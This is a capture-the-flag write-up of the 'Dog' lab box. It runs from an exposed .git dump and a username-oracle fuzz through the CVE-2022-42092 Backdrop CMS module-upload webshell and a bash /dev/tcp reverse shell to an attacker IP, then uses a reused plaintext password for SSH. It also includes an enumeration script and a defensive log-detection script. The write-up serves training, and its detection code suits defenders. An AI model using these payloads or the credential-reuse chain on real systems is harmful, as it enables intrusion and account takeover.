Dog

An exposed .git directory on a Backdrop CMS site leaks the database password, which is reused for a CMS admin account; an authenticated module-upload (CVE-2022-42092) drops a PHP webshell for code execution, and the same password reused once more grants SSH as a local user for the user flag.

Overview

Dog is an easy-difficulty Linux box running Backdrop CMS behind Apache. The web root is served straight from a Git working copy, so the entire .git directory is downloadable — dumping it reveals the database credentials hard-coded in settings.php. That password has been reused for a CMS administrator account, and Backdrop 1.27.1’s manual module installer accepts an archive containing arbitrary PHP (CVE-2022-42092), giving code execution as www-data. The same password is reused yet again for a local user, providing a stable SSH session and the user flag. This post covers recon through user.

Machine Matrix

Radar chart (image not preserved) with axes: Enumeration, Real-Life, CVE, Custom Exploitation, CTF-like.

Enumeration plus CVE: exposed .git leaks DB password, a username oracle fuzz, then Backdrop CVE-2022-42092 module-upload RCE and triple password reuse — realistic chain.

Recon

| Port | Service | Notes |
|---|---|---|
| 22/tcp | OpenSSH 8.2p1 | Ubuntu 20.04 |
| 80/tcp | Apache httpd 2.4.41 | Backdrop CMS, exposed .git |

```bash
nmap -Pn -p- --min-rate=1000 -T4 10.10.11.58   # full TCP sweep for open ports
nmap -Pn -p22,80 -sC -sV 10.10.11.58           # default scripts + version detection on what is open
```

Two key findings from the script scan: the http-generator script picks the generator meta tag out of the front page and identifies Backdrop CMS, and http-git reports a Git repository at /.git/ whose last commit message reads todo: customize url aliases (a hint that URL aliases matter later). Add the host:

```bash
echo "10.10.11.58 dog.htb" | sudo tee -a /etc/hosts
```

Enumeration

An exposed .git directory means the whole source tree is recoverable, even without directory listing, because object and ref paths are predictable. Dump it with git-dumper, then restore the working tree from the recovered index:

```bash
git-dumper http://dog.htb/ dump
cd dump && git restore .   # check out every tracked file from the dumped objects
```

settings.php carries the live database connection string (the host part of the URL is elided here; MySQL is local to the box):

```php
$database = 'mysql://root:BackDropJ2024DS2024@<db-host>/backdrop';
```

MySQL isn't exposed, so this password is only useful if it has been reused somewhere that is, and for that we need a username. Backdrop's login form rate-limits and locks accounts, but the URL-alias endpoint ?q=accounts/<name> is a clean username oracle: an anonymous request gets 403 (access denied to the profile) when the account exists and 404 when it does not. Fuzz it, matching only the 403s:

```bash
ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
  -u 'http://dog.htb/?q=accounts/FUZZ' -mc 403 -c
```

This surfaces two users, john and tiffany. The MySQL password works for tiffany, logging straight into the Backdrop admin dashboard.
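The two enumeration checks above (is /.git/ really served, and which names answer 403 on ?q=accounts/<name>) are small enough to script. The following Python is an added example, not code from the post or from git-dumper/ffuf: the HTTP transport is injected as a plain callable so the decision logic can be exercised offline, and the 403/404 interpretation is the one described above. Anything other than 403/404 (a 429 from throttling, a 5xx) is deliberately reported as "unknown" rather than guessed.

```python
"""Probe an exposed .git directory and the Backdrop ?q=accounts/<name> oracle.

Added example for this post; base URL, header names and the fake transport in
the usage note are assumptions, not anything the target or tools define.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, bytes]           # (HTTP status, response body)
Fetch = Callable[[str], Response]      # injected transport: url -> Response


def urllib_fetch(url: str) -> Response:
    """Real transport: GET the URL and return (status, body) without raising on 4xx/5xx."""
    req = urllib.request.Request(url, headers={"User-Agent": "probe/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def git_exposed(fetch: Fetch, base: str) -> bool:
    """True when /.git/HEAD is served and its body is a real git HEAD file.

    A directory-listing page or a catch-all front controller also answers 200,
    so the content is checked: either a symbolic ref or a detached 40-hex SHA.
    """
    status, body = fetch(base.rstrip("/") + "/.git/HEAD")
    if status != 200:
        return False
    head = body.strip()
    if head.startswith(b"ref: refs/"):
        return True
    return len(head) == 40 and all(c in b"0123456789abcdef" for c in head)


def account_state(status: int) -> str:
    """Map the oracle's status code to a verdict; never infer from other codes."""
    if status == 403:
        return "exists"     # profile page is there, anonymous may not view it
    if status == 404:
        return "absent"     # no such user, so no path to deny
    return "unknown"        # throttled/error: retry later, do not conclude


def enumerate_users(fetch: Fetch, base: str, names: List[str]) -> Dict[str, str]:
    """Query ?q=accounts/<name> for each candidate and return name -> verdict."""
    results: Dict[str, str] = {}
    for name in names:
        path = "/?q=" + urllib.parse.quote("accounts/" + name, safe="/")
        status, _ = fetch(base.rstrip("/") + path)
        results[name] = account_state(status)
    return results


if __name__ == "__main__":
    # Live usage against the box from the post (assumed reachable):
    target = "http://dog.htb"
    print("git exposed:", git_exposed(urllib_fetch, target))
    print(enumerate_users(urllib_fetch, target, ["john", "tiffany", "admin"]))
```

Pointing urllib_fetch at a real host performs one request per name; for a 10-million-line wordlist use ffuf as the post does, and keep this for the status-code logic and for spot checks.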

Foothold

Confirm the CMS version from the profile info file:

```bash
curl -s http://dog.htb/core/profiles/testing/testing.info
# version = 1.27.1
```

Backdrop CMS 1.27.1 is vulnerable to an authenticated remote command execution via malicious module upload — CVE-2022-42092. The Exploit-DB PoC crafts a module archive containing a PHP webshell. The install endpoint must be reached through the URL-alias form (?q=admin/modules/install), the same trick used for username enumeration.

The web server reports the Zip PHP extension is missing, but the Manual installation page accepts tar, tgz, tar.gz, and tar.bz2. Generate the payload and repackage it as a gzip tarball:

```bash
python3 exploit.py http://dog.htb      # PoC writes the shell/ module directory
tar -czvf shell.tar.gz shell           # repackage it in a format the installer can unpack
```

Upload shell.tar.gz via Manual installation → Upload a module, theme, or layout archive. On success the shell lands at /modules/shell/shell.php:

```bash
curl -s "http://dog.htb/modules/shell/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data)
```

Catch a reverse shell:

```bash
nc -lvnp 1337
```

The shell reads cmd from the query string, so keep the payload in the URL with -G (curl's --data-urlencode would otherwise POST it):

```bash
curl -s -G "http://dog.htb/modules/shell/shell.php" \
  --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.8/1337 0>&1"'
```

Then stabilise the TTY:

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then: export TERM=xterm, press Ctrl-Z, run `stty raw -echo; fg` on the local side, Enter
```
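Every step of the foothold above leaves a recognisable trace in the Apache access log, so it is worth seeing the chain from the defending side before moving on. The Python below is an added example, not anything from the post or the box: it parses combined-format log lines and flags /.git/ retrieval, a burst of distinct ?q=accounts/<name> probes answered 403/404 from one client, a POST to the module installer, and 200s for a ?cmd= request under /modules/. The log lines are constructed for the example and the five-name threshold is an assumption to tune per site.

```python
"""Flag the Dog foothold chain in Apache combined-format access logs.

Added example for this post; SAMPLE lines are constructed, ORACLE_THRESHOLD is
an assumed tuning value, and the rule names are this example's own.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ORACLE_RE = re.compile(r"[?&]q=accounts/([^&/]+)")   # unencoded form only; see note
CMD_RE = re.compile(r"[?&]cmd=")

ORACLE_THRESHOLD = 5   # distinct names probed by one client before we call it fuzzing


def parse(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Run all four rules over the lines; return sorted (client_ip, rule) pairs."""
    findings: Set[Tuple[str, str]] = set()
    probed: Dict[str, Set[str]] = defaultdict(set)   # ip -> names that drew 403/404
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], int(rec["status"])

        if path.startswith("/.git/"):                 # git-dumper / http-git style access
            findings.add((ip, "git_dir_access"))

        m = ORACLE_RE.search(path)                    # username oracle probes
        if m and status in (403, 404):
            probed[ip].add(m.group(1))

        if method == "POST" and "admin/modules/install" in path:
            findings.add((ip, "module_install_post"))   # legitimate for admins; correlate

        if path.startswith("/modules/") and CMD_RE.search(path) and status == 200:
            findings.add((ip, "webshell_exec"))

    for ip, names in probed.items():
        if len(names) >= ORACLE_THRESHOLD:
            findings.add((ip, "username_oracle_fuzz"))
    return sorted(findings)


# Constructed sample: one attacker (10.10.14.8) running the full chain, and one
# unrelated client (10.10.14.9) viewing a single profile, which must not fire.
SAMPLE = [
    '10.10.14.8 - - [10/Mar/2025:10:00:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "git-dumper/1.0"',
    '10.10.14.8 - - [10/Mar/2025:10:00:02 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "git-dumper/1.0"',
    '10.10.14.8 - - [10/Mar/2025:10:00:10 +0000] "GET /?q=accounts/admin HTTP/1.1" 404 2210 "-" "fuzzer"',
    '10.10.14.8 - - [10/Mar/2025:10:00:10 +0000] "GET /?q=accounts/root HTTP/1.1" 404 2210 "-" "fuzzer"',
    '10.10.14.8 - - [10/Mar/2025:10:00:10 +0000] "GET /?q=accounts/test HTTP/1.1" 404 2210 "-" "fuzzer"',
    '10.10.14.8 - - [10/Mar/2025:10:00:11 +0000] "GET /?q=accounts/john HTTP/1.1" 403 1980 "-" "fuzzer"',
    '10.10.14.8 - - [10/Mar/2025:10:00:11 +0000] "GET /?q=accounts/guest HTTP/1.1" 404 2210 "-" "fuzzer"',
    '10.10.14.8 - - [10/Mar/2025:10:00:12 +0000] "GET /?q=accounts/tiffany HTTP/1.1" 403 1980 "-" "fuzzer"',
    '10.10.14.8 - - [10/Mar/2025:10:05:30 +0000] "POST /?q=admin/modules/install HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.10.14.8 - - [10/Mar/2025:10:05:45 +0000] "GET /modules/shell/shell.php?cmd=id HTTP/1.1" 200 55 "-" "curl/8.5.0"',
    '10.10.14.9 - - [10/Mar/2025:10:06:00 +0000] "GET /?q=accounts/tiffany HTTP/1.1" 403 1980 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for ip, rule in detect(SAMPLE):
        print(f"{ip}  {rule}")
```

The oracle rule matches only the literal ?q=accounts/ form; a client that percent-encodes the query, or that hits the clean alias path instead, needs the path normalised first. The module_install_post rule fires on normal administration too, so treat it as a correlation signal alongside the others rather than an alert on its own.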

User flag

/etc/passwd shows a real interactive account:

```bash
grep bash /etc/passwd
# johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
```

The database password is reused once more — this time as johncusack’s Linux login. Drop the fragile webshell for a clean SSH session:

```bash
sshpass -p 'BackDropJ2024DS2024' ssh johncusack@dog.htb
```

The user flag lives at /home/johncusack/user.txt:

```bash
cat /home/johncusack/user.txt
# [redacted]
```

Privilege escalation (sudo on the bee Backdrop CLI, whose eval runs PHP as root) is left as an exercise — this post stops at user.

This post is licensed under CC BY 4.0 by the author.